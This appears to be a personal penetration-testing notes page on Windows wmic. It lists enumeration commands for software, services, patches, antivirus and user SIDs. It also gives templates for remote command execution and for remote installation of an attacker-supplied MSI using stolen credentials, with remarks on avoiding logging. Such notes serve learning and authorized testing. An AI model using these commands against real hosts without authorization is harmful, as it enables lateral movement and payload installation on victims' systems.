The wmic command on Windows is extremely useful, but is also deprecated (because of its usefulness to attackers!). It can be used on Windows 10 21H1 and earlier. For later systems, PowerShell command-lets will need to be used instead (which increases the risk that activity will be logged).

wmic product get name,version,vendor — list all installed software (but misses 32-bit applications installed on a 64-bit OS)
wmic service get name,displayname,pathname,startmode — list all services
wmic qfe get caption,description,hotfixid,installedon — list installed updates
wimc service list brief — another way of listing services
wmic service where "name like '$SERVICE_NAME'" get name,pathname — get information about a particular service
wmic /namespace:\root\securitycenter2 path antivirusproduct — enumerate antivirus
wmic useraccount get name,sid — Display SIDs for all (local) users

Remote process creation

How to run a remote command with wmic

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    process call create "$SOME_COMMAND"

Link to original

Install an MSI package

How to remotely install a Windows package with wmic

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    product call install PackageLocation=$PATH_TO_ATTACKER_MSI

Link to original

Cardboard Iguana Security

Explorer

wmic

Remote process creation

How to run a remote command with wmic

Install an MSI package

How to remotely install a Windows package with wmic

Graph View

Table of Contents

Backlinks